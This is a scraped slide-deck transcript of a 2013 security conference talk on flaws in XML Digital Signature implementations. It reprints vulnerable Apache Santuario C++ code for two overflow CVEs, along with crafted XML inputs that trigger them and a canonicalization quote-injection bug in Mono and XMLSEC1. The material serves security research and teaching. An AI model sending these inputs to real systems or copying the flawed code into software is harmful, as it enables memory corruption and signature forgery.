the forger’s art - hack in the box security …...digital signatures •hmac truncation...
TRANSCRIPT
![Page 1: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/1.jpg)
Research. Response. Assurance. @CTXIS
The Forger’s ArtExploiting XML Digital Signature Implementations
HITB 2013
James Forshaw (@tiraniddo)
![Page 2: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/2.jpg)
What am I going to talk
about?
• XML Digital Signature Implementations
• Vulnerabilities and how to exploit
– Memory Corruption
– Denial of Service
– Parsing Issues
– Signature Spoofing
• Demos
![Page 3: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/3.jpg)
Why?
• SOAP Web Service Security
• Visa 3D Secure / Verified by Visa
• SAML Assertions
• MS Office Signatures
• .NET ClickOnce/XBAP Manifests
![Page 4: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/4.jpg)
Once upon a time, on a client site...
![Page 5: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/5.jpg)
Implementations
![Page 6: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/6.jpg)
Existing Attacks
• Been numerous attacks against XML
Digital Signatures
• HMAC Truncation (CVE-2009-0217)
• Signature Wrapping
• XSLT – DoS/Remote Code Execution
![Page 7: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/7.jpg)
What are XML Digital
Signatures?
![Page 8: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/8.jpg)
XML Digital Signatures
![Page 9: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/9.jpg)
Signing XML
XML Document
<good/>
Read Bytes Sign
Signature
![Page 10: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/10.jpg)
Signing XML
XML Document
<good/>
S/MIME? PGP?
Signature
![Page 11: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/11.jpg)
Of Course Not
As the "great" Steve Ballmer might have said:
"XML Developers, XML Developers,
XML Developers!"
![Page 12: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/12.jpg)
Signing XML
Reference
XML Document
<good/>
Transform
Signed XML Document
<good/>
SHA1: 09381a09812f20...
Digest
SignedInfo
<SignedInfo><CanonicalizationMethod/><SignatureMethod/><Reference URI="#id">
<Transforms/><DigestMethod/><DigestValue>Bo0b5...</DigestValue>
</Reference></SignedInfo>
Canonicalize
SHA1: 5282abc5efefa0...
Digest
Sign
Identity
Build Result
<good/>
![Page 13: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/13.jpg)
<good><Signature xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo>
<CanonicalizationMethodAlgorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
<SignatureMethodAlgorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
<Reference URI=""><Transforms>
<TransformAlgorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
</Transforms><DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><DigestValue>Bo0b5...</DigestValue>
</Reference></SignedInfo><SignatureValue>K4TYp...</SignatureValue>
</Signature></good>
Signed XML Document
![Page 14: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/14.jpg)
<good><Signature xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo>
<CanonicalizationMethodAlgorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
<SignatureMethodAlgorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
<Reference URI=""> <Transforms>
<TransformAlgorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
</Transforms> <DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/> <DigestValue>Bo0b5...</DigestValue>
</Reference> </SignedInfo> <SignatureValue>K4TYp...</SignatureValue>
</Signature></good>
Signed XML Document
![Page 15: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/15.jpg)
<good><Signature xmlns="http://www.w3.org/2000/09/xmldsig#"> <SignedInfo>
<CanonicalizationMethodAlgorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
<SignatureMethodAlgorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
<Reference URI=""> <Transforms>
<TransformAlgorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
</Transforms> <DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/> <DigestValue>Bo0b5...</DigestValue>
</Reference> </SignedInfo> <SignatureValue>K4TYp...</SignatureValue>
</Signature> </good>
Signed XML Document
![Page 16: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/16.jpg)
<good><Signature xmlns="http://www.w3.org/2000/09/xmldsig#"> <SignedInfo>
<CanonicalizationMethodAlgorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
<SignatureMethodAlgorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
<Reference URI=""><Transforms>
<TransformAlgorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
</Transforms><DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><DigestValue>Bo0b5...</DigestValue>
</Reference></SignedInfo><SignatureValue>K4TYp...</SignatureValue>
</Signature> </good>
Signed XML Document
![Page 17: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/17.jpg)
<good><Signature xmlns="http://www.w3.org/2000/09/xmldsig#"> <SignedInfo>
<CanonicalizationMethodAlgorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
<SignatureMethodAlgorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
<Reference URI=""><Transforms>
<TransformAlgorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
</Transforms><DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><DigestValue>Bo0b5...</DigestValue>
</Reference></SignedInfo> <SignatureValue>K4TYp...</SignatureValue>
</Signature> </good>
Signed XML Document
![Page 18: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/18.jpg)
Signature Parsing
SignedInfoVerification
Reference Verification
Verification Pipeline
?
<SignedInfo><CanonicalizationMethod/><SignatureMethod/><Reference URI="#id">
<Transforms/><DigestMethod/><DigestValue>Bo0b5...</DigestValue>
</Reference></SignedInfo>
<good/>
![Page 19: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/19.jpg)
Signature Parsing Bugs
![Page 20: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/20.jpg)
CVE-2013-2156
• Affected Apache Santuario C++
• Unauthenticated
• Heap overflow in Exclusive
Canonicalization prefix list
![Page 21: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/21.jpg)
Canonicalization Prefix List
<TransformAlgorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList="xsd ds"
xmlns="http://www.w3.org/2001/10/xml-exc-c14n#"/></Transform>
![Page 22: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/22.jpg)
Canonicalization Prefix List
<TransformAlgorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList="xsd ds"
xmlns="http://www.w3.org/2001/10/xml-exc-c14n#"/> </Transform>
![Page 23: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/23.jpg)
CVE-2013-2156bool isWhiteSpace(char c) {
return c == ' ' || c == '\0' || c == '\t'|| c == '\r' || c == '\n';
}
void XSECC14n20010315::setExclusive(char * xmlnsList) { char* nsBuf = new char [strlen(xmlnsList) + 1]; int i = 0, j = 0;
while (xmlnsList[i] != '\0') { while (isWhiteSpace(xmlnsList[i]))
++i; // Skip white space
j = 0; while (!isWhiteSpace(xmlnsList[i]))
nsBuf[j++] = xmlnsList[i++]; // Copy name// Terminate the stringnsBuf[j] = '\0';
// Add to exclusive listm_exclNSList.push_back(strdup(nsBuf));
}}
![Page 24: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/24.jpg)
CVE-2013-2156bool isWhiteSpace(char c) {
return c == ' ' || c == '\0' || c == '\t'|| c == '\r' || c == '\n';
}
void XSECC14n20010315::setExclusive(char * xmlnsList) { char* nsBuf = new char [strlen(xmlnsList) + 1]; int i = 0, j = 0;
while (xmlnsList[i] != '\0') { while (isWhiteSpace(xmlnsList[i]))
++i; // Skip white space
j = 0; while (!isWhiteSpace(xmlnsList[i]))
nsBuf[j++] = xmlnsList[i++]; // Copy name // Terminate the string nsBuf[j] = '\0';
// Add to exclusive list m_exclNSList.push_back(strdup(nsBuf));
}}
![Page 25: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/25.jpg)
CVE-2013-2156bool isWhiteSpace(char c) {
return c == ' ' || c == '\0' || c == '\t'|| c == '\r' || c == '\n';
}
void XSECC14n20010315::setExclusive(char * xmlnsList) { char* nsBuf = new char [strlen(xmlnsList) + 1]; int i = 0, j = 0;
while (xmlnsList[i] != '\0') { while (isWhiteSpace(xmlnsList[i]))
++i; // Skip white space
j = 0; while (!isWhiteSpace(xmlnsList[i]))
nsBuf[j++] = xmlnsList[i++]; // Copy name // Terminate the string nsBuf[j] = '\0';
// Add to exclusive list m_exclNSList.push_back(strdup(nsBuf));
}}
![Page 26: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/26.jpg)
CVE-2013-2156bool isWhiteSpace(char c) {
return c == ' ' || c == '\0' || c == '\t'|| c == '\r' || c == '\n';
}
void XSECC14n20010315::setExclusive(char * xmlnsList) { char* nsBuf = new char [strlen(xmlnsList) + 1]; int i = 0, j = 0;
while (xmlnsList[i] != '\0') { while (isWhiteSpace(xmlnsList[i]))
++i; // Skip white space
j = 0; while (!isWhiteSpace(xmlnsList[i]))
nsBuf[j++] = xmlnsList[i++]; // Copy name // Terminate the string nsBuf[j] = '\0';
// Add to exclusive list m_exclNSList.push_back(strdup(nsBuf));
}}
![Page 27: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/27.jpg)
CVE-2013-2156bool isWhiteSpace(char c) {
return c == ' ' || c == '\0' || c == '\t'|| c == '\r' || c == '\n';
}
void XSECC14n20010315::setExclusive(char * xmlnsList) { char* nsBuf = new char [strlen(xmlnsList) + 1]; int i = 0, j = 0;
while (xmlnsList[i] != '\0') { while (isWhiteSpace(xmlnsList[i]))
++i; // Skip white space
j = 0; while (!isWhiteSpace(xmlnsList[i]))
nsBuf[j++] = xmlnsList[i++]; // Copy name// Terminate the stringnsBuf[j] = '\0';
// Add to exclusive listm_exclNSList.push_back(strdup(nsBuf));
}}
![Page 28: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/28.jpg)
CVE-2013-2156bool isWhiteSpace(char c) {
return c == ' ' || c == '\0' || c == '\t'|| c == '\r' || c == '\n';
}
void XSECC14n20010315::setExclusive(char * xmlnsList) { char* nsBuf = new char [strlen(xmlnsList) + 1]; int i = 0, j = 0;
while (xmlnsList[i] != '\0') { while (isWhiteSpace(xmlnsList[i]))
++i; // Skip white space
j = 0; while (!isWhiteSpace(xmlnsList[i]))
nsBuf[j++] = xmlnsList[i++]; // Copy name // Terminate the string nsBuf[j] = '\0';
// Add to exclusive list m_exclNSList.push_back(strdup(nsBuf));
}}
![Page 29: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/29.jpg)
CVE-2013-2156bool isWhiteSpace(char c) {
return c == ' ' || c == '\0' || c == '\t'|| c == '\r' || c == '\n';
}
void XSECC14n20010315::setExclusive(char * xmlnsList) { char* nsBuf = new char [strlen(xmlnsList) + 1]; int i = 0, j = 0;
while (xmlnsList[i] != '\0') { while (isWhiteSpace(xmlnsList[i]))
++i; // Skip white space
j = 0; while (!isWhiteSpace(xmlnsList[i]))
nsBuf[j++] = xmlnsList[i++]; // Copy name // Terminate the string nsBuf[j] = '\0';
// Add to exclusive list m_exclNSList.push_back(strdup(nsBuf));
}}
![Page 30: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/30.jpg)
Exploiting It
<Reference URI=""><Transforms><Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList="AAAA..."/>
</Transform><Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList=""/>
</Transform></Transforms></Reference>
![Page 31: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/31.jpg)
Exploiting It
<Reference URI=""><Transforms><Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList="AAAA..."/>
</Transform><Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList=""/>
</Transform></Transforms></Reference>
![Page 32: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/32.jpg)
Exploiting It
<Reference URI=""><Transforms><Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList="AAAA..."/>
</Transform><Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><InclusiveNamespaces PrefixList=""/>
</Transform></Transforms></Reference>
![Page 33: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/33.jpg)
First Transform
'A'xmlnsList
nsBuf
'A' 'A' 'A' 'A'
'A' 'A' 'A' 'A' 'A'
'A' 'A' 'A' 'A'
'A' 'A' 'A' 'A'
![Page 34: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/34.jpg)
Second Transform
' 'xmlnsList
nsBuf
0 'A' 'A' 'A'
X X
'A' 'A' 'A' 'A'
i
isWhiteSpace() == true
j
![Page 35: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/35.jpg)
Second Transform
' 'xmlnsList
nsBuf
0 'A' 'A' 'A'
X X
'A' 'A' 'A' 'A'
i
isWhiteSpace() == true
j
![Page 36: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/36.jpg)
Second Transform
' 'xmlnsList
nsBuf
0 'A' 'A' 'A'
'A' X
'A' 'A' 'A' 'A'
i
isWhiteSpace() == false
j
![Page 37: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/37.jpg)
Second Transform
' 'xmlnsList
nsBuf
0 'A' 'A' 'A'
'A' X
'A' 'A' 'A' 'A'
i
isWhiteSpace() == false
j
'A' 'A' 'A' 'A' 'A' 'A' 'A'
![Page 38: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/38.jpg)
CVE-2013-2154
• Affected Apache Santuario C++
• Unauthenticated
• Stack overflow parsing a Reference
URI
• Bonus: Fix was wrong, ended up with a heap overflow instead
![Page 39: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/39.jpg)
Reference URIs
Reference Type Example
ID Reference <Reference URI="#xyz">
Entire Document <Reference URI="">
XPointer ID <Reference URI="#xpointer(id('xyz'))">
XPointer Entire Document <Reference URI="#xpointer(/)">
External <Reference URI="http://domain.com/file.xml">
<good id="xyz"></good>
![Page 40: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/40.jpg)
CVE-2013-2154
const char* URI = getReferenceUri();
// Check for #xpointer(id('A'))if (strncmp(URI, "#xpointer(id('", 14) == 0){
size_t len = strlen(&URI[14]); char tmp[512];
if (len > 511) len = 511;
size_t j = 14, i = 0;
// Extract ID valuewhile (URI[j] != '\'') {
tmp[i++] = URI[j++]; } tmp[i] = '\0';
}
![Page 41: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/41.jpg)
CVE-2013-2154
const char* URI = getReferenceUri();
// Check for #xpointer(id('A'))if (strncmp(URI, "#xpointer(id('", 14) == 0){
size_t len = strlen(&URI[14]); char tmp[512];
if (len > 511) len = 511;
size_t j = 14, i = 0;
// Extract ID valuewhile (URI[j] != '\'') {
tmp[i++] = URI[j++]; } tmp[i] = '\0';
}
![Page 42: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/42.jpg)
CVE-2013-2154
const char* URI = getReferenceUri();
// Check for #xpointer(id('A')) if (strncmp(URI, "#xpointer(id('", 14) == 0){
size_t len = strlen(&URI[14]); char tmp[512];
if (len > 511) len = 511;
size_t j = 14, i = 0;
// Extract ID valuewhile (URI[j] != '\'') {
tmp[i++] = URI[j++]; } tmp[i] = '\0';
}
![Page 43: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/43.jpg)
CVE-2013-2154
const char* URI = getReferenceUri();
// Check for #xpointer(id('A')) if (strncmp(URI, "#xpointer(id('", 14) == 0){
size_t len = strlen(&URI[14]); char tmp[512];
if (len > 511) len = 511;
size_t j = 14, i = 0;
// Extract ID valuewhile (URI[j] != '\'') {
tmp[i++] = URI[j++]; } tmp[i] = '\0';
}
![Page 44: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/44.jpg)
Exploiting It
<root> <Signature xmlns="http://www.w3.org/2000/09/xmldsig#"> <SignedInfo> <CanonicalizationMethod/> <SignatureMethod/> <Reference URI="#xpointer(id('AAAA...')"><Transforms/><DigestMethod/><DigestValue>Bo0b5...</DigestValue>
</Reference></SignedInfo> <SignatureValue>K4TYp....</SignatureValue>
</Signature> </root>
![Page 45: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/45.jpg)
Demo Time!
![Page 46: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/46.jpg)
Reference Verification Bugs
![Page 47: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/47.jpg)
XML Equivalence
• Different physical XML representations
might still be equivalent
<good x="1" y="2"/>
<good y="2" x="1"></good>
≡
![Page 48: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/48.jpg)
Naïve Verification
SHA1 SHA1
≡
1cc730a1b7826... 3826723a6d5ff15...≠
<good x="1" y="2"/> <good y="2" x="1"></good>
![Page 49: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/49.jpg)
≡
Canonicalization (C14N)
SHA1
9c251a80204943...
<good x="1" y="2"/> <good y="2" x="1"></good>
Canonicalizer
<good x="1" y="2"></good>
![Page 50: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/50.jpg)
Canonicalization (C14N)
XML Document 1 XML Document 2
SHA1
XXXXXXXXXXXXXX...
Canonical XML
Canonicalizer
≢
![Page 51: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/51.jpg)
Mono C14N Vulnerability
• Affected Mono (unfixed)
• Also affected XMLSEC1 (fixed)
• Allows limited signed content
modification
• Same author for both implementations
![Page 52: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/52.jpg)
W3C Canonical XML
![Page 53: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/53.jpg)
The Bug
<good x='"'/> <good x="""></good>
<good xmlns='"'/> <good xmlns="""></good>
LibXML2 Requires Valid URLs for Namespaces, though Mono doesn't
Still, xmlns='http://["]/' works on XMLSEC1
![Page 54: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/54.jpg)
